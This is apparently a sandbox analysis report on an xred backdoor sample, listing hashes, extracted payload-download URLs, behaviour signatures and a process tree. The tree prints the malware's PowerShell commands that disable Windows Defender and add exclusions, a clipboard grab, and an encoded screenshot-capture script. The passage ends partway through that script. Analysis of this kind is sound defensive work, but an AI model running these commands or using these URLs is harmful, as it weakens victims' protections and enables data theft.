xred | 39df5ebb9e956cec79d11fb54a677fb3e0b62477b583f012b69cb697eb2a00c3

Analysis

max time kernel
60s
max time network
89s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04/12/2024, 17:47

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

maple.rar
Size

69.3MB
MD5

b363d8c2c9b491c9c34a52e0e6af0310
SHA1

dfe10fb5b37990cea349a7ff79c207d4ee1a2f67
SHA256

39df5ebb9e956cec79d11fb54a677fb3e0b62477b583f012b69cb697eb2a00c3
SHA512

63e05d8911c2e7cea491191355fe51390326a3a2c86565ec8e4acb0c942c625e9f808b779476439eecc7f27262db00d4ae8a8bf778891aa70ddf485ee4a806ee
SSDEEP

1572864:Q949aoK4M3asKv8Wj/4K37cHnmoDSmmLh5deSlCVfpu:Q98K4CTQ/4MMX+eSo+

Score

10^/10

xred backdoor collection credential_access defense_evasion discovery execution pyinstaller spyware stealer upx

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Signatures

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3864	powershell.exe
2996	powershell.exe
4880	powershell.exe
5928	powershell.exe
3484	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	loader.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
6832	cmd.exe
220	powershell.exe

Executes dropped EXE 8 IoCs

pid	Process
4512	maple.exe
1868	maple.exe
3592	main.exe
3376	main.exe
5624	loader.exe
5724	Host Process for Windows Services.exe
5828	Host Process for Windows Services.exe
5880	loader.exe

Loads dropped DLL 64 IoCs

pid	Process
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3376	main.exe
3376	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3592	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe
3376	main.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	ip-api.com
54	api.ipify.org
55	api.ipify.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
7104	tasklist.exe
1320	tasklist.exe
1432	tasklist.exe
5480	tasklist.exe

UPX packed file 30 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5828-4071-0x00007FF964F70000-0x00007FF965558000-memory.dmp	upx
behavioral2/memory/5828-4072-0x00007FF975A90000-0x00007FF975AB4000-memory.dmp	upx
behavioral2/memory/5828-4073-0x00007FF97A4F0000-0x00007FF97A4FF000-memory.dmp	upx
behavioral2/memory/5828-4082-0x00007FF96AF80000-0x00007FF96AFAD000-memory.dmp	upx
behavioral2/memory/5828-4115-0x00007FF96A1E0000-0x00007FF96A353000-memory.dmp	upx
behavioral2/memory/5828-4090-0x00007FF96A360000-0x00007FF96A383000-memory.dmp	upx
behavioral2/memory/5828-4089-0x00007FF97A500000-0x00007FF97A519000-memory.dmp	upx
behavioral2/memory/5828-4129-0x00007FF97A170000-0x00007FF97A17D000-memory.dmp	upx
behavioral2/memory/5828-4139-0x00007FF96A1B0000-0x00007FF96A1DE000-memory.dmp	upx
behavioral2/memory/5828-4138-0x00007FF969D70000-0x00007FF969E28000-memory.dmp	upx
behavioral2/memory/5828-4137-0x00007FF969E30000-0x00007FF96A1A5000-memory.dmp	upx
behavioral2/memory/5828-4136-0x00007FF964F70000-0x00007FF965558000-memory.dmp	upx
behavioral2/memory/5828-4128-0x00007FF971E50000-0x00007FF971E69000-memory.dmp	upx
behavioral2/memory/5828-4142-0x00007FF97A150000-0x00007FF97A15D000-memory.dmp	upx
behavioral2/memory/5828-4145-0x00007FF969C30000-0x00007FF969D4C000-memory.dmp	upx
behavioral2/memory/5828-4141-0x00007FF969D50000-0x00007FF969D64000-memory.dmp	upx
behavioral2/memory/5828-4140-0x00007FF975A90000-0x00007FF975AB4000-memory.dmp	upx
behavioral2/memory/5828-4305-0x00007FF96A360000-0x00007FF96A383000-memory.dmp	upx
behavioral2/memory/5828-4389-0x00007FF96A1E0000-0x00007FF96A353000-memory.dmp	upx
behavioral2/memory/5828-4446-0x00007FF971E50000-0x00007FF971E69000-memory.dmp	upx
behavioral2/memory/5828-4461-0x00007FF969D70000-0x00007FF969E28000-memory.dmp	upx
behavioral2/memory/5828-4460-0x00007FF969E30000-0x00007FF96A1A5000-memory.dmp	upx
behavioral2/memory/5828-4479-0x00007FF964F70000-0x00007FF965558000-memory.dmp	upx
behavioral2/memory/5828-4494-0x00007FF96A1B0000-0x00007FF96A1DE000-memory.dmp	upx
behavioral2/memory/5828-4493-0x00007FF969C30000-0x00007FF969D4C000-memory.dmp	upx
behavioral2/memory/5828-4485-0x00007FF96A1E0000-0x00007FF96A353000-memory.dmp	upx
behavioral2/memory/5828-4480-0x00007FF975A90000-0x00007FF975AB4000-memory.dmp	upx
behavioral2/memory/5828-4747-0x00007FF975A90000-0x00007FF975AB4000-memory.dmp	upx
behavioral2/memory/5828-4752-0x00007FF96A1E0000-0x00007FF96A353000-memory.dmp	upx
behavioral2/memory/5828-4746-0x00007FF964F70000-0x00007FF965558000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0007000000000705-4616.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	loader.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5960	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3076	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	loader.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3008	7zFM.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeRestorePrivilege	3008	7zFM.exe
Token: 35	3008	7zFM.exe
Token: SeSecurityPrivilege	3008	7zFM.exe
Token: SeSecurityPrivilege	3008	7zFM.exe
Token: SeSecurityPrivilege	3008	7zFM.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe
3008	7zFM.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3008 wrote to memory of 4512	3008	7zFM.exe	90
PID 3008 wrote to memory of 4512	3008	7zFM.exe	90
PID 3008 wrote to memory of 1868	3008	7zFM.exe	93
PID 3008 wrote to memory of 1868	3008	7zFM.exe	93
PID 4512 wrote to memory of 3592	4512	maple.exe	95
PID 4512 wrote to memory of 3592	4512	maple.exe	95
PID 3592 wrote to memory of 4836	3592	main.exe	97
PID 3592 wrote to memory of 4836	3592	main.exe	97
PID 1868 wrote to memory of 3376	1868	maple.exe	96
PID 1868 wrote to memory of 3376	1868	maple.exe	96
PID 3592 wrote to memory of 1292	3592	main.exe	98
PID 3592 wrote to memory of 1292	3592	main.exe	98
PID 3376 wrote to memory of 4232	3376	main.exe	99
PID 3376 wrote to memory of 4232	3376	main.exe	99
PID 3376 wrote to memory of 5048	3376	main.exe	100
PID 3376 wrote to memory of 5048	3376	main.exe	100
PID 3008 wrote to memory of 5624	3008	7zFM.exe	104
PID 3008 wrote to memory of 5624	3008	7zFM.exe	104
PID 5624 wrote to memory of 5724	5624	loader.exe	105
PID 5624 wrote to memory of 5724	5624	loader.exe	105
PID 5724 wrote to memory of 5828	5724	Host Process for Windows Services.exe	106
PID 5724 wrote to memory of 5828	5724	Host Process for Windows Services.exe	106
PID 5624 wrote to memory of 5880	5624	loader.exe	107
PID 5624 wrote to memory of 5880	5624	loader.exe	107
PID 5624 wrote to memory of 5880	5624	loader.exe	107
PID 5828 wrote to memory of 6208	5828	Host Process for Windows Services.exe	108
PID 5828 wrote to memory of 6208	5828	Host Process for Windows Services.exe	108
PID 5828 wrote to memory of 6216	5828	Host Process for Windows Services.exe	109
PID 5828 wrote to memory of 6216	5828	Host Process for Windows Services.exe	109
PID 5828 wrote to memory of 6232	5828	Host Process for Windows Services.exe	110
PID 5828 wrote to memory of 6232	5828	Host Process for Windows Services.exe	110

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\maple.rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3008
- C:\Users\Admin\AppData\Local\Temp\7zO0CBFAFF7\maple.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0CBFAFF7\maple.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Users\Admin\AppData\Local\Temp\onefile_4512_133778081171180986\main.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0CBFAFF7\maple.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c
      4⤵
      PID:4836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:1292
- C:\Users\Admin\AppData\Local\Temp\7zO0CB41997\maple.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0CB41997\maple.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1868
- - C:\Users\Admin\AppData\Local\Temp\onefile_1868_133778081184149861\main.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0CB41997\maple.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c
      4⤵
      PID:4232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5048
- C:\Users\Admin\AppData\Local\Temp\7zO0CB2B118\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0CB2B118\loader.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5624
- - C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe
    "C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5724
  - - C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe'"
        5⤵
        
        PID:6208
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3864
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:6216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
        5⤵
        
        PID:6232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6340
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6356
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:7104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:6768
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:4792
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:6832
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:220
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6908
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6920
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:6968
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:3076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:7024
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACg